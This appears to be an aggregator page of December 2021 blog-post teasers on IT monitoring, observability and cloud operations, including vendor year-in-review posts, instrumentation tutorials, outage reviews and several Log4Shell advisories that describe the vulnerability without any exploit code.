Operations | Monitoring | ITSM | DevOps | Cloud

December 2021

2021: The new working model is hybrid

As the world is trying to regain its usual pace, we at Site24x7 have been engrossed in churning out new features to help organizations enhance the health of their IT resources and meet their evolving monitoring needs. We've drafted a summary of notable features to look back on our achievements this year. We extended our monitoring capabilities for Kubernetes, network traffic, ISP latency, VMware ESXi hardware, and Mobile APM for React Native apps.

ECS Monitoring Metrics that Help Optimize and Troubleshoot Tasks

Compute functions that run on Amazon’s Elastic Container Service (ECS) require regular monitoring to ensure proper running and managing of containerized functions on AWS – in short, ECS monitoring is a must. ECS can manage containers with either EC2 or Fargate compute functions. While EC2 and Fargate are compute services, EC2 allows users to configure virtually every functional aspect. Fargate is more limited in its available settings but is simpler to set up.

Grafana Tempo 2021: Year in review

Grafana Tempo has had quite a year. Just eight months after it was announced at ObservabilityCON 2020, the open source tracing solution went GA. Since the Tempo team released v1.0 in June, we have ingested more than 39 trillion spans, a 26x increase from last year. We also introduced Grafana Enterprise Traces, which is powered by Tempo, to the Grafana Enterprise Stack.

Datadog vs. Splunk vs. Scout | How Do They Compare?

Every day the world is changing in terms of technology. A new innovation happens every second, and software and websites are becoming more and more advanced. We can now access almost every service on the internet, and software needs to be maintained as a top priority so that customer service will not get hindered. Software monitoring, however, is not an easy task. It is a 24x7 business because any user can face an issue at any time.

Log4J Does What?!!!

You have probably heard of Log4Shell, the security vulnerability that has ‘earned’ itself an NIST rank of 10: In this post I will show a really basic example of how this vulnerability actually works. I will walk you through some basic usage of the Log4J library and then show how some fairly basic inputs into this library can cause truly unexpected, and potentially disastrous, outcomes.

Part I: A Journey Into the World of Advanced Security Monitoring

Dealing with hundreds of security alerts on a daily basis is a challenge. Especially when many are false positives that waste our time and all take up too much of our valuable time to sift through. Let me tell you how our security team fixed this, as we built security around the JFrog products. First, let me tell you a little bit about our team.

8 Best Practices to Simplify Your Data Center Consolidation

Whether you are downsizing your infrastructure within a single room or eliminating half of your data center sites, a data center consolidation is a complex, risk-prone project. Fortunately, you can mitigate many of the mistakes and unwelcome surprises that even the most experienced data center professionals find derailing their consolidation.

Remote Data Center Management: Metering, Monitoring, & Management in the New Normal

The COVID-19 pandemic ushered in a "new normal," and data center professionals must adapt to keep up with the issues of today while maintaining uptime and business continuity. New challenges include an increased demand on infrastructure with a higher potential for outages, more time pressure on projects, and less staff onsite resulting in a more difficult environment for collaboration, planning new infrastructure and services, and performing changes and maintenance. Data center managers must develop a comprehensive remote data center management strategy to find success.

What are AWS EC2 Instances? A Tutorial for EC2 Metrics Shipping with Logz.io

Amazon Elastic Compute Cloud (a.k.a., EC2), is no doubt the core current computing infrastructure. It sits at the heart of AWS, the main kind of structure for housing virtual machines and containers for development and operations. Applying standards of observability with EC2 logs and obviously EC2 metrics (or any kind of AWS metrics for that matter) will inform you on if you have the right sorts of instances in place (and the appropriate size of those instances).

New in StatusGator: See component statuses

A small but useful new feature is now available in StatusGator: You can see the status of all the components of a given service from your filter configuration page. As a reminder, component filters are a feature of all StatusGator paid plans. They allow you to filter your notifications and dashboard service statuses to specific components of a given service. Services such as large cloud providers often have dozens or even hundreds of individual regions or products.

Outage Alert: Top 10 Downtime Incidents of 2021

2021 has been an eye-opening year for both businesses and consumers who use popular websites and applications. We have all seen notable increases in the frequency and severity of outages as dependency on internet infrastructure grows – with no signs of slowing down. With our reliance on automation and connectivity expected to increase in 2022 – let’s review some of the top internet outages and website downtime incidents of 2021.

Grafana Loki 2021: Year in review

This year, we were excited to deliver the easiest version of Grafana Loki to use yet. With Loki 2.4, the Loki team introduced a simple, scalable deployment, and over the past 12 months, we added lots of great new features. Not to mention, we launched Grafana Enterprise Logs, a new addition to the Grafana Enterprise Stack that’s powered by Loki. But none of this would have been possible without our active community: In 2021, Loki had 166 contributors and 823 PRs in GItHub.

Ruby Application Manual Instrumentation for Distributed Traces

OpenTelemetry is a project by the Cloud Native Computing Foundation aimed to standardize the way that application telemetry data is recorded and utilized by platforms downstream. This application trace data can be valuable for application owners to understand the relationship between the components and services in their code, the request volume and latency introduced in each step, and ultimately where the bottlenecks are that are resulting in poor user experience.

How to Detect Log4Shell Events Using Coralogix

The Log4J library is one of the most widely-used logging libraries for Java code. On the 24th of November 2021, Alibaba’s Cloud Security Team found a vulnerability in the Log4J, also known as log4shell, framework that provides attackers with a simple way to run arbitrary code on any machine that uses a vulnerable version of the Log4J. This vulnerability was publicly disclosed on the 9th of December 2021.

Grafana 2021: Year in review

Numbers don’t lie — and the data shows that in a year in which we, once again, endured unpredictable changes, Grafana experienced unparalleled success. In June, we introduced Grafana 8.0, which included unified alerting, new visualizations, real-time streaming, and more. Since then we have introduced a host of new features as well as new data source plugins that only reinforce Grafana’s commitment to our “big tent” philosophy.

6 Alternatives to Sentry Error Monitoring

You are likely to face challenges in selecting the best alternatives to Sentry for error monitoring. It can be daunting to read through multiple software companies and vendors to note their features, benefits, and shortcomings. Let’s discuss simplifying this process by covering the six best alternatives to Sentry error monitoring. Feel free to navigate this guide using the links below.

Hybrid Cloud Predictions: 2022 Will Be the Year of Cloud Arbitrage

The as-a-service model and shared economy has changed the way people think about products, properties, and partnerships. Netflix found massive success not by improving the DVD experience but by eliminating it altogether. Companies like WeWork, Airbnb, and Vrbo created a shared economy that reduces the need for ownership. As a part of our business transformation in the last one year, Virtana has embraced both the sharing economy and as-a-service subscription.

How Product Teams and CTOs Can Create Customer Delight

Customer satisfaction is about meeting customer expectations, customer delight is about exceeding them. Building customer delight into your product means going above and beyond simple customer satisfaction in ways that build a long-term emotional connection and loyalty towards your company. And customer delight matters.

How to Monitor Microsoft Teams

There is no doubt about it that the events of 2020 triggered a huge surge in the use of unified communication products. In the consumer space, everyone and their grandmother became familiar with Zoom; in the enterprise space though, many took advantage of their Microsoft licensing to leverage Teams meetings and calls as a primary communication mechanism. This, in turn, has focused a lot more attention for system administrators on how to monitor Microsoft 365 (O365) and Teams in particular.

Predictions 2022: OpsRamp Technology Leaders Sound Off on What to Expect in the New Year

2021 brought us widespread COVID vaccines, the Great Resignation, global supply chain disruption, inflation that went from transitory to persistent, accelerated digital transformation in the wake of the pandemic, an attempt at a return to normalcy—and the office—and plenty of uncertainty for the year ahead, thanks to the Delta and Omicron variants.

Monitoring Office365 and Azure Health Status with Coralogix

Life is all about perspective, and the way we look at things often defines us as individuals, professionals, business entities, and products. How you understand the world is influenced by many details, or in the case of your application – many data sources. At Coralogix, we not only preach comprehensive data analysis but strive to enable it by continuously adding new ways to collect data.

Historical status data now available

StatusGator customers on our Venture plan have long had access to historical cloud status data. In the past, a simple support request was all it took to get a CSV or JSON feed of any cloud service status data. Now, we’ve brought that data into the StatusGator app itself. A new menu item is now available: Reports & Data. From there, you can choose a data range and download the complete history of all the services in your dashboard: We’d love to know what you think of this feature.

How product teams can manage their performance using Grafana, Prometheus, and Oracle metrics

Ever known a project manager who thinks a task takes minutes when it really takes hours? One company has developed a helpful monitoring tool that not only helps project managers make more realistic estimates, but also helps product teams save time, increase efficiency, and improve their overall performance. At ObservabilityCON 2020, Walter Ritzel Paixão Côrtes, a product designer at Dell, gave a presentation about a data-driven solution his team developed called Product Team Observability.

Automatic creation of monitored objects in Avantra

One of the main development themes for the Avantra 21.11 release was making life easier. This includes using and rolling out Avantra. Our goal is to reduce the effort required on your part and let you focus on the things that are important to you and your business. As a result, Avantra 21.11 comes with a number of improvements to the onboarding process for new systems, and maintaining and updating existing ones. So, let me take you through these new improvements.

Wellness and surfing... with Kentik!

It’s an exciting time here at Kentik. We’re expanding into new markets, working closely with amazing customers, and continuing to hire talented people to grow our team. We announced a new round of funding in the fall. We’re continuously building on our product. And we have our sights set on scaling our systems to large numbers. As Kentik’s backend engineering manager, I know this has kept our team very busy.

Incident Review - The Third AWS Outage in December: When it Rains, it Pours

The following is an analysis of the Amazon Web Services (AWS) incident on 12/22/2021. When it comes to major AWS outages, three times is certainly not the charm. For the third time in three weeks, the public cloud giant reported an outage, this time due to a power outage “within a single data center within a single Availability Zone (USE1-AZ4) in the U.S.-EAST-1 Region," according to the AWS status page. Here at Catchpoint, we first observed issues at 07:11 a.m.

Goodbye 2021 & Hello 2022!

Netreo enjoyed a tremendous year, and we are all exceedingly grateful for our outstanding customers. May you, your colleagues, family and friends enjoy a healthy and happy holiday season filled with laughter, warmth and joy. We know our success is based on your success, so without further ado, let’s take a look at how our 2021 highlights will fuel a great 2022 for all our customers!

Ask Miss O11y, Holiday Edition

Ooh, good question! My favorite thing about this part of the year is that work slows down, everybody is on vacation, and those of us not traveling get to work on little projects that we’re too busy to touch most of the year. As Martin Thwaites put it: “The Product Owners are away, the devs will play.” For Martin, this year, “play” means adding tracing to more of their services.

Smarter Digital Payment Monitoring to Protect Business Operations

You place your mug on your desk and boot your computer. Like every morning, you skim over various dashboards on one screen and sift through your email alerts on the other before you start pulling the regular reports. But this morning turns out to be nothing like other mornings. It is about to take a mean twist that will keep you from ever finishing your morning coffee.

What InsurTech industry trends to watch for in 2022

In case you missed it, insurtech — technology developed to improve and transform the insurance industry — is having a bit of a moment. Forrester recently reported record-breaking funding for insurtechs, closing Q3 at $15 billion – more funding than in 2019 and 2020 combined – with more deals anticipated by the end-of-year.

Grafana EMEA meetup recap: shift left observability, AI and load testing, monitoring plants, and more

On Dec. 8, we gathered the Grafana EMEA community for another dynamic meetup. Experts from the Grafana Labs and k6 teams alongside observability pros from different organizations covered topics ranging from shift left observability practices to monitoring your green thumb at home with Grafana. In case you missed the virtual get together, here’s a recap of each talk along with the session videos.

Auto-Instrumenting Node.js Apps with OpenTelemetry

In this tutorial, we will go through a working example of a Node.js application auto-instrumented with OpenTelemetry. In our example we’ll use Express, the popular Node.js web application framework. Our example application is based on two locally hosted services sending data to each other. We will instrument this application with OpenTelemetry’s Node.js client library to generate trace data and send it to an OpenTelemetry Collector.

Network Monitoring and Troubleshooting for Remote Workers with SPI Health and Safety

With many businesses having switched to part-time or even full-time remote work, the challenge for IT teams becomes how to provide quick and efficient support for network problems remotely. In this article, we’re running you through how SPI Health and Safety is using Obkio to monitor network performance and troubleshoot performance issues for all their remote call center employees.

Can your SAP operations keep up with business demands?

SAP operations teams are increasingly required to support new initiatives within their businesses, while keeping the lights on throughout the existing landscape. In a world where time is a scarce resource, this can be a challenging balancing act. Too often teams are far closer to losing their balance than they would like (or than the business would like to hear).

AIOps for Network Monitoring

Multi-cloud hybrid cloud environments, microservices architectures, the rapid growth in the number of mission-critical applications, and the sudden surge in remote work have made enterprise networks exponentially complex. These networks are often not designed to handle the variety of physical and wireless media that’s become common today, for instance, the number of video calls, data transfer through screen sharing, etc.

Future Outlook: AIOps Will Be A Must-Have For Enterprises In 2022

If 2020 was a year of turbulence, 2021 was the year of complete digital transformation. Enterprises across the globe focused their efforts on enabling stellar digital experiences — both to customers and internal stakeholders alike. This had a significant impact on the IT landscape. The number of applications that were ‘mission-critical’ increased overnight. In a recent survey, respondents said that they have an average of 71.4 mission-critical applications.

How to Measure Uptime SLOs Using Pingdom and Nobl9

Do you find yourself asking, “What should our first service-level objective (SLO)be?” The simplest way to get started if you have a website is to measure uptime SLOs. The SLO will measure your uptime and how your site compares to your reliability goals. By following the steps outlined here, you can get up and running with your first SLO in minutes. To get started, you’ll need to set up an account on SolarWinds® Pingdom®.

Video Observability: Videoconferencing Runs the World-Here's How to Make Sure Yours Keeps Running

When it comes to work, we all know to put our best foot forward. However, as we increasingly rely on videoconferencing in our everyday work life, success also depends on being able to put our best face forward. Unfortunately, that can add up to a headache for IT when it comes to delivering flawless video experiences to a widely distributed workforce.

Quarterly Product Update: Better Traces, CONCURRENCY, and RATE

At Honeycomb Developer Week, I got an opportunity to walk through a couple of fun new features we’ve shipped since August and ways that we’ve been able to improve Honeycomb for you. Hearing feedback from our users and customers— through support requests, in the Pollinators community, from Twitter, etc.—helps us make Honeycomb better for you.

Top Data Visualisation Tools (2023 Edition)

If you have been trying to compare all of the best data visualisation tools you may have found it difficult to find a detailed list that includes both open-source and proprietary solutions to help you compare and make an informed decision on what you need going forward. In this guide, you will find out everything you need to know about the leading solutions for data visualisation to help you get started with your next analysis project.

Use Datadog's GitHub and source code integrations to streamline troubleshooting

GitHub Apps is a service that helps you automate key processes in your workflow. Datadog now uses GitHub Apps to interact directly with the GitHub API, enabling you to add valuable context to your notebooks. And once you’ve also integrated Datadog with your source code, you can access links to Git repositories and inline code snippets for stack traces.

Monitor Kubernetes with Fairwinds Insights' offering in the Datadog Marketplace

Fairwinds Insights is Kubernetes governance and security software that enables DevOps teams to monitor and prevent configuration problems in their infrastructure and applications. Not only does Fairwinds simplify Kubernetes complexity, but it also reduces risk by surfacing security and reliability issues in your Kubernetes clusters.

Connection Center in 3 mins

Cookdown's Connection Center is designed to make SCOM your single source of truth. Find out all about how it works, our code-free integrations, and much more. Unlock SCOMs full potential by connecting it to all your IT enterprise tools and you'll never miss a critical SCOM alert again! The setup is super simple! To get started just download a FREE 30-DAY TRIAL and you'll be syncing alerts in minutes.

Connection Center Deep Dive

A deep dive into Cookdown's Connection Center is designed to make SCOM your single source of truth. Find out all about how it works, our code-free integrations, and much more. Unlock SCOMs full potential by connecting it to all your IT enterprise tools and you'll never miss a critical SCOM alert again! The setup is super simple! To get started just download a FREE 30-DAY TRIAL and you'll be syncing alerts in minutes.

Connection Center for Webhooks Inbound Demo in 3 mins

This short demo illustrates how Cookdown Connection Center can integrate SCOM with anything, anywhere….! We simply use Webhooks to convert critical SCOM alerts into actionable notifications in real-time. So, now you can push alerts from SCOM to any application supporting Webhooks, which means your team can view alerts in their favorite tools. Find out how Connection Center can get your stakeholders more engaged and better connected!

Connection Center for Webhooks Inbound Deep Dive Demo

This deep dive illustrates exactly how Cookdown Connection Center can integrate SCOM with anything, anywhere….! We simply use Webhooks to convert critical SCOM alerts into actionable notifications in real-time. So, now you can push alerts from SCOM to any application supporting Webhooks, which means your team can view alerts in their favorite tools. Find out how Connection Center can get your stakeholders more engaged and better connected!

Diagnosing Downtime, Made Easy with Uptime.com

Downtime is one diagnosis you don’t want to waste time with second opinions. You want accurate alerting the first time around, followed by drill-down tools to uncover and help you treat root cause as fast as possible. As with any form of health (even domain health), preventive care should always be your first defence. With Uptime.com “preventive care” means 360º monitoring that doesn’t skimp on analysis.

Flask Application Manual Instrumentation for Distributed Traces

In this blog series, we share the application instrumentation steps for distributed tracing with OpenTelemetry standards across multiple languages. Earlier, we covered Java Application Manual Instrumentation for Distributed Traces, Golang Application Instrumentation for Distributed Traces, Node JS Application for Distributed Traces, and DotNet Application Instrumentation for Distributed Traces. In this blog post, we are going to cover.

New Relic vs. Appdynamics vs. Scout APM

New Relic and Appdynamics were the two most dominating APMs in the software industry some years back. But after the advancement of technology, software monitoring tools started capturing the market. Due to some lack of functionalities, customers have begun switching to different tools because now they have a perfect solution for their particular use case.

DX NetOps Support for Symantec Secure Web Gateways (SWG)

DX NetOps network monitoring software now supports Symantec Secure Web Gateways (SWG). This short demo shows how the solution can provide visibility for SWGs in the context of your broader network and network delivery strategy. DX NetOps unifies alarms, performance and flow and can help solve key operational challenges for SWGs including event correlation and streamlined ticketing workflows.

New in Grafana Loki 2.4: The Simple Scalable Deployment Mode

New in Grafana Loki 2.4: The Simple Scalable Deployment Mode This mode is a bridge between running Loki as a single binary/monolithic mode and full-blown microservices. The idea is to give users more flexibility in scaling and provide the advantages of separating the read and write path in Loki. Command to run the flog log generator: Start correlating your data with Grafana Cloud and the new FREE tier.

How Grafana powers the dynamic visualizations of IoT data for AWS IoT TwinMaker

At re:Invent this year, AWS announced its new digital twin service, AWS IoT TwinMaker (in preview), which allows users to create digital twins of real-world systems like buildings, factories, industrial equipment, and production lines. Using a digital twin to monitor and improve operations for a physical system requires ingesting data from IoT sensors, process instruments, cameras, and enterprise systems, and curating and associating data from these disparate sources.

How Product Teams Can Decrease Shopping Cart Abandonment Rate by Improving UX

Checkout optimization can increase conversions by 36% (according to Sleeknote). And if your company struggles with a high cart abandonment rate, you’ll have to work on enhancing your user experience by removing blockers that lead to your customers abandoning their shopping carts. And for that, you will need to leverage qualitative and quantitative user research.

To Mask, or Not to Mask? That Is the Question

While I write this blog post, I reflect on the years of being a system administrator and the task of ensuring that no sensitive data made its way past me. What a daunting task right? The idea that sensitive data can make its way through our systems and other tools and reports is terrifying! Not to mention the potential financial/contractual problems this can cause.

Monitoring AWS EC2 Cloud Instances with AWS CloudWatch

Amazon Elastic Compute Cloud (Amazon EC2) is a web service that provides secure, resizable compute capacity in the cloud. It is designed to make web-scale cloud computing easier for developers. Amazon EC2’s simple web service interface allows you to obtain and configure capacity with minimal friction. It provides you with complete control of your computing resources and lets you run on Amazon’s proven computing environment.

Auvik's Network Vendor Diversity 2021: Who Reigns the Network?

At the end of November 2021, Auvik released our annual Network Vendor Diversity Report, and the data we collected had some interesting findings. Over 520,000 devices across 40,000 networks contributed, showing which vendors are taking a leading share of the market. In this roundup, we’ll show you some of the most interesting learnings we saw in 2021.

Database monitoring with Sumo Logic and OpenTelemetry-powered distributed tracing

We are living in a data world. Data describes and controls almost every aspect of our life, from the president's elections to everyday grocery shopping. Data grows exponentially and so does the complexity of applications that manage that data. We all know the recent shift to microservices and other revolutionary changes that happened in the way we design, develop, deploy and operate modern applications.

A Comprehensive Guide to Firewall Monitoring

Securing your company's network against online threats can seem like a daunting task. There are so many different e-commerce security threats, and it can be hard to know where to start or if you're adequately protected against all of them. One important weapon in the fight for network security is your firewall. Although your firewall will remain hidden from view for most of your employees most of the time, you shouldn't forget about it.

Get the most out of kiosk devices while securing them using MDM

There’s a good chance we all interact with kiosks just as much as we do with humans, and this was true even before the pandemic. Self-service counters, airline check-in systems, library search devices, huge digital billboards for advertising, compact mobile devices for remote workers, ATMs at every corner, you name it.

Sponsored Post

Discovering vulnerable Log4J libraries on your network with EventSentry

Just when the Microsoft Exchange exploit CVE-2021-26855 thought it would win the “Exploit of the year” award, it got unseated by the – still evolving – Log4J exploit just weeks before the end of the year! Had somebody asked Sysadmins in November what Log4J was then I suspect that the majority would have had no idea. It seems that the biggest challenge the Log4J exploit poses for Sysadmins is simply the fact that nobody knows all the places where Log4J is being used.

Exporting and Sharing Graphs From AppSignal

You can now share any graph from AppSignal with your team, company, and the world. Click the export icon in the graph header to create a hosted image that you can link, embed, or download for further annotation. Developers often share performance screenshots with each other. Some screenshots end up on Twitter where developers explain how they improved their application’s performance with AppSignal. We regularly take screenshots of our graphs as well.

Log4Shell: How We Protect Sematext Users

On December 9, 2021, a vulnerability was reported that could allow a system running Apache Log4j 2 version 2.14.1 or below to be compromised and allow an attacker to execute arbitrary code on the vulnerable server. This vulnerability was registered on the National Vulnerability Database as CVE-2021-44228, with a severity score of 10. Here is a diagram of the attack chain from the Swiss Government Computer Emergency Response Team (GovCERT).

Monitor all your Redshift clusters in Grafana with the new Amazon Redshift data source plugin

In collaboration with the AWS team, we have recently released the new Redshift data source plugin for Grafana. Amazon Redshift is the fastest and most widely used cloud data warehouse. It uses SQL to analyze structured and semi-structured data across data warehouses, operational databases, and data lakes by using AWS-designed hardware and machine learning.

Empowering Data Management and DBAs Through Better Tooling | SolarWinds Roundtable

There isn’t a magical solution to the challenges that DBAs face on a daily basis. Instead, you need to become proficient in the use of a number of different tools to achieve your aims. In this roundtable, SolarWinds Head Geek Kevin Kline is joined with Megan Longoria and Jon Moore to discuss the evolution of tools for the accidental and seasoned DBA alike. The panel will discuss tools of the past, their favorite new tools, and overall, why you need database monitoring and operation tools.

What's new in Sysdig - December 2021

Here we are with the final “What’s new in Sysdig” monthly newsletter of the year. First of all, Merry Christmas, メリークリスマス, Buon Natale, 성탄을 축하드려요, С рождеством!, Vrolijk kerstfeest, Feliz Navidad! Whatever you may be celebrating, we wish you a wonderful holiday season from all of us at Sysdig!

Designing and Creating a State-of-the-Art AIOps Solution with Elastic

In this session we will go over our journey during the design and creation of the Tuuring state-of-the-art AIOps solution dedicated to digital performance. We'll highlight our major breakthroughs, lessons learned, how Elastic powers the solution and the value it brings for our customers. Speakers: Eric van Wijhe, Commercial Director, Tuuring Pierre van Elswijk, CEO and Co-founder, Tuuring

The values behind scaling cloud native security at Grafana Labs

On Nov. 8, I started as the new Chief Information and Security Officer at Grafana Labs. In my first five weeks, I’ve met about 100 really amazing people; learned and absorbed early lessons about our workplace culture; kicked off working groups for our 2022 initiatives (bug bounty FTW); and contributed to tackling our first-ever 0day. Amid all of that, I’ve also been doing a lot of thinking.

This Month in Datadog: December 2021 (Episode 7)

Datadog is constantly elevating the approach to cloud monitoring and security. This Month in Datadog updates you on our newest product features, announcements, resources, and events. To learn more about Datadog and start a free 14-day trial, visit Cloud Monitoring as a Service. This month we put the Spotlight on Datadog Sensitive Data Scanner which is now generally available.

Log4j critical vulnerability advice for customers

At Avantra, our customers trust us to keep their business operations based on SAP running smoothly. I have written in the past about the importance of SAP security, and how I believe that in the next few years, SAP risks becoming an attack vector for hackers. It should come as no surprise that security is an area in which Avantra has invested significantly since I became CEO.

Network AF, Episode 7: From Juilliard to bare metal with Zac Smith

In the latest episode of Network AF, your host Avi Freedman chats with Zac Smith. Zac is a 20-year networking veteran, the managing director of Equinix Metal, and a double bass player. Throughout Zac’s career, he’s focused on using software to build automated infrastructure platforms. That includes growing Voxel, the Linux-based hosting platform that sold to Internap in 2011, into one of the early, leading cloud-hosting companies.

ICYMI: Honeycomb Developer Week Wrap-Up

Getting started with observability can be time consuming. It takes time to configure your apps and practice to change the way you approach troubleshooting. So it can be hard to prioritize investing time, especially if you can’t clearly see how that investment will pay off. That’s why we put together Honeycomb Developer Week: short, snackable, time-efficient learning sessions to jumpstart your observability journey.

What is the Purpose of Observability? In a Word, Innovation

Asking an IT engineer or SRE to define the purpose of observability is kind of like asking someone to explain the purpose of life: There are lots of different opinions out there, and no way of proving any of them right or wrong. You could argue that observability is just a buzzword that refers to what used to be called monitoring.

The Top 25 Grafana Interview Questions

If you are looking for your next role which involves an in-depth knowledge of Grafana then you will want to make sure that you have revised sufficiently beforehand. In this resource guide on the top Grafana interview questions, we've listed all of the leading questions that candidates are commonly asked about this popular visual analysis tool alongside the answers you’ll need to pass. Want to improve your knowledge even further?

MQTT Topic and Payload Parsing with Telegraf

Buckle up, this one isn’t short…but I’m hoping it will be thoroughly informative! This post is about Telegraf as a consumer of MQTT messages in the context of writing them to InfluxDB. If you are interested in and unfamiliar with Telegraf, you can view docs here. Unsure if Telegraf aligns with your needs? I make a case for it in the Optimizing Writes section of this blog post. It may also help to have an understanding of Line Protocol, InfluxDB’s default accepted format.

Introducing the Sensu pipeline resource

Sensu’s observability pipeline includes resources for collecting, filtering, transforming, and processing observability data: checks, event filters, mutators, and handlers. These resources and Sensu’s observability pipeline concept are well seasoned and widely used at thousands of companies. However, configuration can be somewhat unintuitive, especially for new users.

AutoNation delivers peerless experiences to every customer

AutoNation delivers everything automotive, from sales and service to collision and parts. It also understands that buying a car is a huge decision, which is why it chose AppDynamics to help it provide a seamless experience for its customers. With full-stack observability across its applications, AutoNation can track, manage and optimize its service performance across the business. AppDynamics breaks down silos between teams so they can triage problems collectively, and quickly. The result is a better experience for thousands of customers across AutoNation’s 300 locations and 27,000 associates.

Managing for Customer Value for Enterprises

Earning customer loyalty is in the interest of both shareholders and management. Companies at the top of their industries in NPS or satisfaction rankings for 3+ years, grow revenues roughly 2.5x as fast as their industry peers and deliver 2-5x times the shareholder returns over the next 10 years. And here are 4 strategies that can help your company achieve consistent growth in customer value:.

Bulk Update Multiple WebLogic WLSDM Settings via WL-OPC

When you need to change WLSDM WebLogic settings and you have so many WLSDM WebLogic domains, use the “WLSDM Configuration” page to standardize the bulk WLSDM WebLogic domains settings. WL-OPC prevents struggling with numerous tabs, unwanted confusion and saves your time with WLSDM Configurations Page!

5 Performance Measurement Metrics for Node.js Applications

Node.js applications are those that are created on the Node.js platform, which is an event-driven I/O server-side JavaScript environment based on Google Chrome's V8 engine. Since both the server-side and client-side are written in JavaScript, Node.js allows for easier and faster code implementation, as well as processing requests quickly and simultaneously. This is especially useful for developing real-time applications, such as chat and streaming.

Dashboard Fridays: Azure VM Health Dashboard

Adam is back for our final Dashboard Fridays video of 2021, and is joined by Azure expert and community hero Cameron Fuller of Catapult Systems! The Azure Management Services team at Catapult required a quick way to visualize the key health pieces for their customers, using a visually intuitive dashboard. In this bitesize video, Cameron will showcase this sample Azure VM Health dashboard focused on free disk space, heartbeat and CPU utilization. Tune in to learn how it was made, the challenges it solves, and how you can easily get your hands on it.

Broadcom Software Agile Operations Division Overview

General Manager Serge Lucio discusses Broadcom Software's Agile Operations Division, which offers business-critical software solutions that help the world’s leading companies transform their operating model to be more agile. Our ValueOps, DevOps, and AIOps solutions help these organizations drive innovation and achieve operational excellence to realize better business outcomes – and better experiences for their customers.

Monitoring remote user workstations with Prometheus, Ansible, and Grafana Cloud

Monitoring is usually associated with servers and applications, but the fintech automation platform Ocrolus recently needed to set up monitoring for a different purpose: to gain meaningful data and insights about nearly 1,000 remote user workstations.

Building Observability in Your CircleCI Deploy

With Liz Fong Jones, Principal Developer Advocate at Honeycomb and Ryan Pedersen, Senior Solutions Engineer at CircleCI In this talk, you’ll learn how Honeycomb keeps its CircleCI workflow duration at about 10 minutes per build through parallelizing build steps, using native container builders per architecture, and tracing execution of the build to know where to optimize.

LogicMonitor launches Santa Tracker Dashboard to monitor annual Christmas flight

A pillar of the December holiday season, the Elves at Santa’s Workshop work tirelessly year-round to provide a quality Christmas experience for children around the world who have made it to the Nice list. To ensure all children on the Nice list receive their Christmas packages in a timely manner, the IT team at Santa’s Workshop turned to LogicMonitor to monitor Santa’s annual journey around the globe in real-time.

Azure Thames Valley: Azure CosmosDB as a Knowledge Graph (in SquaredUp's Cloud product)

In this session, Richard Jones, SquaredUp CTO, shares how SquaredUp's new Cloud product utilises Azure CosmosDB as a graph database, to provide an explorable and searchable knowledge graph of all your applications, services, and resources spanning all your tools and platforms.

How a Superior Site Uptime Monitoring Solution Could Save Your Organization $1.85 Million

We all know the pleasure we feel when we dig into an old pair of jeans and pull out a crumpled $5 bill, or when we finally get around to vacuuming our car (“Hey, I don’t remember eating onion rings in here”) and find a few bucks in loose change. It’s as if the universe has taken a moment to smile on us.

Graph Observability: Honeycomb and Apollo GraphQL With OpenTelemetry

With David Pickavance, Senior Sales Engineer at Apollo GraphQL Learn how to use Honeycomb, Apollo Studio, and Open Telemetry to optimize GraphQL performance for a federated graph. See how to debug a federated GraphQL query across subgraphs and down to the database layer using Honeycomb.

Global Azure AD Outage Affecting Microsoft 365 Services December 15

Microsoft has had its own share of outages recently and during the evening of December 15th Azure AD was the cloud culprit. As a result, the Exoprise sensors detected this Microsoft 365 outage more than an hour before Microsoft informed customers of the issue. Here’s some of the errors that users were experiencing if they attempted to sign into Microsoft services: Most of our worldwide customers knew well in advance of the problem before users or business suffered.

ITOM 2021 recap: Features that enabled an incredible network management experience

From introducing new automation capabilities to offering all new integration options this past year, ManageEngine’s ITOM suite of solutions have been supercharged to seamlessly manage complex networks. These new, powerful product enhancements and feature releases have honed the ITOM suit’s superior network management capabilities for IT admins worldwide.

Nastel Products Are Not Affected by Log4j Vulnerability Issues

Recent news about Log4j has enterprises and vendors scrambling for information and answers, including customers of messaging middleware and Integration Infrastructure Management (i2M) products. Nastel Technologies customers will not be exposed to any risks from this vulnerability, but enterprises are encouraged to check with their Cloud and other solution vendors to protect themselves and their data.

Cloud monitoring 101

Cloud monitoring is a concept that refers to a process of examining, monitoring, and controlling a cloud workflow. Cloud monitoring may be performed manually or via automated monitoring services or technologies to ensure that a cloud is operating. This procedure, centered on security and administration, has become critical for firms that depend on cloud technology.

Customer Experience: Working with OpsLogix

Microsoft's System Center Operations Manager (SCOM) is a monitoring platform that comes with many potential benefits; however, it can also be overwhelming to manage and be responsible for. With extensive, up-to-date knowledge and experience with SCOM, we provide products and services at the forefront of monitoring. In addition to the products and services, OpsLogix works with personal support and various sources of digital content to further enhance the application of those.

RapidSpike 2021 Christmas Message

Whilst 2021 has been a tough year for many of us, almost as tough as 2020, whether in business, professionally or personally, we need to remain optimistic in 2022. Ecommerce and selling goods online will only grow stronger, with the Nasdaq predictions that 95% will be sold online by 2040 is accelerating much faster due to the covid pandemic.

SecOps for Safer, More Efficient ITOps

When the Nobel Prize for physics was announced in October 2021, one of the winners was Italian theoretical physicist Giorgio Parisi, whose groundbreaking research helped decode complex physical systems, opening the door for breakthroughs in mathematics, science, and artificial intelligence. Decoding complex physical systems? If the science thing didn’t work out, Parisi could have pursued a career in security operations.

Introducing the Sentry data source plugin for Grafana

We’re thrilled to announce the addition of the Sentry data source plugin to Grafana. Grafana Labs worked in partnership with Sentry, the code observability platform, to help development teams see the issues that matter and solve them faster — across their entire tech stack — so they can remove silos and ship with confidence.

Yes, Open Source Is Sustainable

Two months ago, we announced our annual investment in open source maintainers, mostly folks whose work we depend on to deliver Sentry to you, plus a few research and hobby projects that our employees put on our radar. Two days ago, six of these maintainers joined us for a one-hour panel called “The Future of Open Source: Is It Sustainable?” I co-hosted with Jessica Lord, Product Manager of GitHub Sponsors.

How to Perform Log Analysis

Logfile analysis plays a central role in enhancing the observability of your IT estate, helping operations teams and SRE engineers to identify issues as they emerge and track down the cause of failures quickly. As the number of log entries generated on any given day in a medium-sized business easily numbers in the thousands, viewing and analyzing logs manually to realize these benefits is not a realistic option. This is where automated real-time log analysis comes in.

Simplify Your Budget Planning with Ingest-Only Pricing for LogStream Cloud

Over the last year, we’ve seen tremendous growth in both demand and usage for LogStream Cloud. It is exciting to be able to speed up time to value, reduce the total cost of ownership, and deliver LogStream to customers in a way that best fits their organizational needs. We here at Cribl have been working with our cloud customers to better understand how to optimize LogStream Cloud pricing to provide the best possible ROI.

VMware Advanced Monitoring for Horizon - App Volumes

